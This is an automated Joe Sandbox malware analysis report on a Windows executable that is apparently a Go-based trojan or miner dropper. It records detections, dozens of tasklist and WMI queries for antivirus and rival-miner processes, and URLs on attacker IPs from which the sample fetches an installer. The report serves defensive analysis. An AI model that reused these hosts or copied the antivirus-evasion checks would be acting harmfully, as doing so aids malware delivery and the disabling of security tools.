Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AI7f43Z7AC.exe

Overview

General Information

Sample name:AI7f43Z7AC.exe
renamed because original name is a hash value
Original sample name:c188e86f54843fc6f187d63a9c1f9327d1fff8167a9d5404661e1a6b78e3824f.exe
Analysis ID:1574473
MD5:a7d826bf33220f0f9da9357416ff27ca
SHA1:16f0bba1fab5cae5663fbe4ba3f11d08bc0a6e79
SHA256:c188e86f54843fc6f187d63a9c1f9327d1fff8167a9d5404661e1a6b78e3824f
Tags:178-215-224-246exeuser-JAMESWT_MHT
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Found Tor onion address
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains sections with non-standard names
Potential time zone aware malware
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Too many similar processes found

Classification

  • System is w10x64
  • AI7f43Z7AC.exe (PID: 6120 cmdline: "C:\Users\user\Desktop\AI7f43Z7AC.exe" MD5: A7D826BF33220F0F9DA9357416FF27CA)
    • conhost.exe (PID: 2936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 6724 cmdline: tasklist /FI "IMAGENAME eq ksoftriqd.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 4148 cmdline: tasklist /FI "IMAGENAME eq network0.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 5088 cmdline: tasklist /FI "IMAGENAME eq kthreaddi].exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 5012 cmdline: tasklist /FI "IMAGENAME eq kthreaddi.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 5008 cmdline: tasklist /FI "IMAGENAME eq kthreaddk.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 6256 cmdline: tasklist /FI "IMAGENAME eq sysrv.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 6628 cmdline: tasklist /FI "IMAGENAME eq c3pool.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 3508 cmdline: tasklist /FI "IMAGENAME eq kthreaddk.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 3136 cmdline: tasklist /FI "IMAGENAME eq dbused.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 2896 cmdline: tasklist /FI "IMAGENAME eq kthreaddi.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 7044 cmdline: tasklist /FI "IMAGENAME eq kdevtmpfsi.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 1548 cmdline: tasklist /FI "IMAGENAME eq kinsing.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 7012 cmdline: tasklist /FI "IMAGENAME eq gitlabw.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 6596 cmdline: tasklist /FI "IMAGENAME eq monero.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 3052 cmdline: tasklist /FI "IMAGENAME eq kthreaddw.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 3664 cmdline: tasklist /FI "IMAGENAME eq ARestore.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 5844 cmdline: tasklist /FI "IMAGENAME eq asOELnch.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 3220 cmdline: tasklist /FI "IMAGENAME eq buVss.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 5156 cmdline: tasklist /FI "IMAGENAME eq cltLMH.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 3172 cmdline: tasklist /FI "IMAGENAME eq cltRT.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 3352 cmdline: tasklist /FI "IMAGENAME eq coInst.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 1864 cmdline: tasklist /FI "IMAGENAME eq coNatHst.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 2144 cmdline: tasklist /FI "IMAGENAME eq CpySnpt.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 4328 cmdline: tasklist /FI "IMAGENAME eq EFAInst64.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 1588 cmdline: tasklist /FI "IMAGENAME eq elaminst.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 616 cmdline: tasklist /FI "IMAGENAME eq FLDgHost.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 3632 cmdline: tasklist /FI "IMAGENAME eq InstCA.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 5484 cmdline: tasklist /FI "IMAGENAME eq MCUI32.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 5324 cmdline: tasklist /FI "IMAGENAME eq Navw32.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 4916 cmdline: tasklist /FI "IMAGENAME eq ncolow.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 1032 cmdline: tasklist /FI "IMAGENAME eq NortonSecurity.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 5008 cmdline: tasklist /FI "IMAGENAME eq NSc.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 6332 cmdline: tasklist /FI "IMAGENAME eq nsWscSvc.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 6104 cmdline: tasklist /FI "IMAGENAME eq nuPerfScan.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 4828 cmdline: tasklist /FI "IMAGENAME eq RuleUp.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 4236 cmdline: tasklist /FI "IMAGENAME eq SEFInst.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • tasklist.exe (PID: 3500 cmdline: tasklist /FI "IMAGENAME eq Sevntx64.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: AI7f43Z7AC.exeReversingLabs: Detection: 18%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
Source: AI7f43Z7AC.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

barindex
Source: AI7f43Z7AC.exe, 00000001.00000000.2130832097.00000000008DB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: m=nil base , val X25519%w%.0wuint16uint32uint64structchan<-<-chan ValueAcceptServernetdnsdomaingophertelnet.localreturn.onionip+netCommonGetACPrdtscppopcntcmd/goheaderAnswerLengthSTREETavx512rdrandrdseedkinsinggitlabwCpySnptSEFInstUpgradeWSCStubmsmpengavkwctlavguardashServtmntsrvefpeadmkpf4guiMCSHELLkavfswpkavtraykavfsgtkavfswhafwServAvastUIAvastNMprocessTrailerHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUG:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTconsolePATHEXT19531259765625abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltfloat32float64forcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingUNKNOWN:events, goid= s=nil
Source: AI7f43Z7AC.exeString found in binary or memory: m=nil base , val X25519%w%.0wuint16uint32uint64structchan<-<-chan ValueAcceptServernetdnsdomaingophertelnet.localreturn.onionip+netCommonGetACPrdtscppopcntcmd/goheaderAnswerLengthSTREETavx512rdrandrdseedkinsinggitlabwCpySnptSEFInstUpgradeWSCStubmsmpengavkwctlavguardashServtmntsrvefpeadmkpf4guiMCSHELLkavfswpkavtraykavfsgtkavfswhafwServAvastUIAvastNMprocessTrailerHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUG:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTconsolePATHEXT19531259765625abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltfloat32float64forcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingUNKNOWN:events, goid= s=nil
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 3693
Source: unknownNetwork traffic detected: HTTP traffic on port 3693 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 3693
Source: unknownNetwork traffic detected: HTTP traffic on port 3693 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 3693
Source: unknownNetwork traffic detected: HTTP traffic on port 3693 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 3693
Source: unknownNetwork traffic detected: HTTP traffic on port 3693 -> 49908
Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 3693
Source: unknownNetwork traffic detected: HTTP traffic on port 3693 -> 49960
Source: global trafficTCP traffic: 192.168.2.6:49743 -> 107.172.88.151:3693
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.88.151
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.88.151
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.88.151
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.88.151
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.88.151
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.88.151
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.88.151
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.88.151
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.88.151
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.88.151
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.88.151
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.88.151
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.88.151
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.88.151
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.88.151
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.88.151
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.88.151
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.88.151
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.88.151
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.88.151
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.88.151
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.88.151
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.88.151
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.88.151
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.88.151
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.88.151
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.88.151
Source: global trafficHTTP traffic detected: GET /get-url-win HTTP/1.1Host: 107.172.88.151:3693User-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global trafficHTTP traffic detected: GET /get-url-win HTTP/1.1Host: 107.172.88.151:3693User-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global trafficHTTP traffic detected: GET /get-url-win HTTP/1.1Host: 107.172.88.151:3693User-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global trafficHTTP traffic detected: GET /get-url-win HTTP/1.1Host: 107.172.88.151:3693User-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global trafficHTTP traffic detected: GET /get-url-win HTTP/1.1Host: 107.172.88.151:3693User-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: AI7f43Z7AC.exeString found in binary or memory: http://107.172.88.151:3693/get-url-winfailed
Source: AI7f43Z7AC.exe, 00000001.00000002.3382940903.000000C00035C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://176.120.72.138:9999/installer/wininiti
Source: tasklist.exeProcess created: 115
Source: classification engineClassification label: mal60.troj.evad.winEXE@583/0@0/1
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2936:120:WilError_03
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeFile opened: C:\Windows\system32\870e4b9d0af43f3220b4349076f233359ddc2b7857a2b7f7432e60f570599e10AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJump to behavior
Source: AI7f43Z7AC.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;KSOFTRIQD.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;NETWORK0.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;NUPERFSCAN.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;KTHREADDI].EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;MCSHELL.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;ASWTOOLSSVC.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;SEFINST.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;MONERO.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;KTHREADDI.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;KTHREADDI.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;NTRTSCAN.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;KTHREADDK.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;NSC.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;SYSRV.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;C3POOL.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;PERSFW.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;KTHREADDK.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;DBUSED.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;KTHREADDI.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;SYMDGNHC.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;KDEVTMPFSI.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;COINST.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;NISUM.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;KINSING.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;CLTLMH.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;GITLABW.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;SRTSP_CA.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;MONERO.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;SYMERR.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;KTHREADDW.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;SYMERR.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;ARESTORE.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;ASOELNCH.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;AVASTUI.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;BUVSS.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;KAVTRAY.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;KPF4GUI.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;CLTLMH.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;CLTRT.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;KAVFSMUI.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;ELAMINST.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;MCSHIELD.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;COINST.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;CONATHST.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;CPYSNPT.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;EFAINST64.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;ELAMINST.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;FLDGHOST.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;WSCSTUB.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;C3POOL.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;INSTCA.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;MCUI32.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;ASWENGSRV.EXE&apos;
